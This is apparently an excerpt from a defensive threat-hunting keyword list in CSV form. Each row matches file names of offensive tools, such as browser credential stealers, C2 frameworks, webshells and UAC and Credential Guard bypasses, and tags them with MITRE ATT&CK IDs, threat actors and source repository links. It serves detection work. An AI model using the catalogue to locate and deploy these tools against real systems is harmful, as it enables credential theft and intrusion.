"*\brc.zip*",".{0,1000}\\brc\.zip.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14382"
"*\BrowserDataGrabber.pdb*",".{0,1000}\\BrowserDataGrabber\.pdb.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","14384"
"*\BrowserDataGrabber\*",".{0,1000}\\BrowserDataGrabber\\.{0,1000}","offensive_tool_keyword","Browser Data Grabber","credential access tool used by the Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://github.com/n37sn4k3/BrowserDataGrabber","1","0","N/A","N/A","10","1","7","4","2018-05-28T15:49:03Z","2018-05-04T12:33:32Z","14385"
"*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14386"
"*\BrowserEnum.log*",".{0,1000}\\BrowserEnum\.log.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","#logfile","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","14387"
"*\BrowserExfelterator.cs*",".{0,1000}\\BrowserExfelterator\.cs.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","0","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","14388"
"*\BrowserGhost.csproj*",".{0,1000}\\BrowserGhost\.csproj.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14389"
"*\BrowserGhost.exe*",".{0,1000}\\BrowserGhost\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14390"
"*\BrowserGhost.pdb*",".{0,1000}\\BrowserGhost\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14391"
"*\BrowserGhost.sln*",".{0,1000}\\BrowserGhost\.sln.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14392"
"*\BrowserGhost-master*",".{0,1000}\\BrowserGhost\-master.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","N/A","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","14393"
"*\browserhistory.csv*",".{0,1000}\\browserhistory\.csv.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14394"
"*\BrowserLogger.ps1*",".{0,1000}\\BrowserLogger\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14395"
"*\BrowserSnatch.sln*",".{0,1000}\\BrowserSnatch\.sln.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14396"
"*\BrowserSnatch-master*",".{0,1000}\\BrowserSnatch\-master.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","N/A","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","14397"
"*\browsinghistoryview\browsinghistoryview64.exe*",".{0,1000}\\browsinghistoryview\\browsinghistoryview64\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","14398"
"*\brute force.cna*",".{0,1000}\\brute\sforce\.cna.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14399"
"*\Brute RDP.rar*",".{0,1000}\\Brute\sRDP\.rar.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14400"
"*\bruteforce-ftp.py*",".{0,1000}\\bruteforce\-ftp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14401"
"*\bruteforce-http.py*",".{0,1000}\\bruteforce\-http\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14402"
"*\Bruteforcer.*",".{0,1000}\\Bruteforcer\..{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","14403"
"*\bruteforce-rdp.py*",".{0,1000}\\bruteforce\-rdp\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14404"
"*\bruteforce-smb.py*",".{0,1000}\\bruteforce\-smb\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14405"
"*\bruteforce-ssh.py*",".{0,1000}\\bruteforce\-ssh\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","14406"
"*\brutereflect.dll*",".{0,1000}\\brutereflect\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14407"
"*\BX RAT V*.exe*",".{0,1000}\\BX\sRAT\sV.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14411"
"*\BX RAT.exe*",".{0,1000}\\BX\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14412"
"*\BypassAddUser.exe*",".{0,1000}\\BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14413"
"*\BypassAddUser.exe*",".{0,1000}\\BypassAddUser\.exe.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","14414"
"*\BypassAddUser.pdb*",".{0,1000}\\BypassAddUser\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14415"
"*\BypassAddUser-master*",".{0,1000}\\BypassAddUser\-master.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","14416"
"*\bypass-clm.exe*",".{0,1000}\\bypass\-clm\.exe.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14417"
"*\bypass-clm.sln*",".{0,1000}\\bypass\-clm\.sln.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14418"
"*\bypass-clm\Program.cs*",".{0,1000}\\bypass\-clm\\Program\.cs.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","14419"
"*\BypassCredGuard.cpp*",".{0,1000}\\BypassCredGuard\.cpp.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14420"
"*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14421"
"*\BypassCredGuard.exe*",".{0,1000}\\BypassCredGuard\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14422"
"*\BypassCredGuard.log*",".{0,1000}\\BypassCredGuard\.log.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14423"
"*\bypasscredguard.pdb*",".{0,1000}\\bypasscredguard\.pdb.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","14424"
"*\bypass-iisuser-p.asp*",".{0,1000}\\bypass\-iisuser\-p\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14425"
"*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","14426"
"*\bypassuac.txt*",".{0,1000}\\bypassuac\.txt.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","0","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","14427"
"*\bypassuac-x64.dll*",".{0,1000}\\bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","metasploit command lines patterns","T1573.002  -  T1021","TA0001 - TA0002 - TA0003","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","14428"
"*\bypass-waf.asp*",".{0,1000}\\bypass\-waf\.asp.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14429"
"*\bypass-with-base32.php*",".{0,1000}\\bypass\-with\-base32\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14430"
"*\C$\__output*",".{0,1000}\\C\$\\__output.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","smbexec behavior","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","14431"
"*\C$\wh0nqs.txt.*",".{0,1000}\\C\$\\wh0nqs\.txt\..{0,1000}","offensive_tool_keyword","PetitPotato","Local privilege escalation via PetitPotam (Abusing impersonate privileges)","T1134.005 - T1548.001","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/PetitPotato","1","0","N/A","N/A","10","5","430","52","2023-03-30T10:45:00Z","2022-04-19T19:59:19Z","14432"
"*\c2_server.py*",".{0,1000}\\c2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027  -  T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","N/A","10","10","56","16","2024-07-05T11:05:30Z","2023-02-03T16:46:33Z","14433"
"*\c2_setup_token.txt*",".{0,1000}\\c2_setup_token\.txt.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14434"
"*\c2-3.4.0.zip*",".{0,1000}\\c2\-3\.4\.0\.zip.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14435"
"*\c2-3.4.0_amd64_windows.exe*",".{0,1000}\\c2\-3\.4\.0_amd64_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14436"
"*\c2-3.4.0_i386_windows.exe*",".{0,1000}\\c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14437"
"*\c2-3.4.0_i386_windows.exe*",".{0,1000}\\c2\-3\.4\.0_i386_windows\.exe.{0,1000}","offensive_tool_keyword","hak5 cloudc2","Cloud C2 makes it easy for pentesters and security teams to deploy and manage Hak5 gear from the cloud","T1021 - T1102 - T1213","TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2?","1","0","N/A","N/A","10","9","N/A","N/A","N/A","N/A","14438"
"*\C2concealer*",".{0,1000}\\C2concealer.{0,1000}","offensive_tool_keyword","C2concealer","C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/C2concealer","1","0","N/A","N/A","10","10","1053","172","2024-06-25T11:10:54Z","2020-03-23T14:13:16Z","14439"
"*\C2Config.ini*",".{0,1000}\\C2Config\.ini.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","14440"
"*\C2Prank.ps1*",".{0,1000}\\C2Prank\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14441"
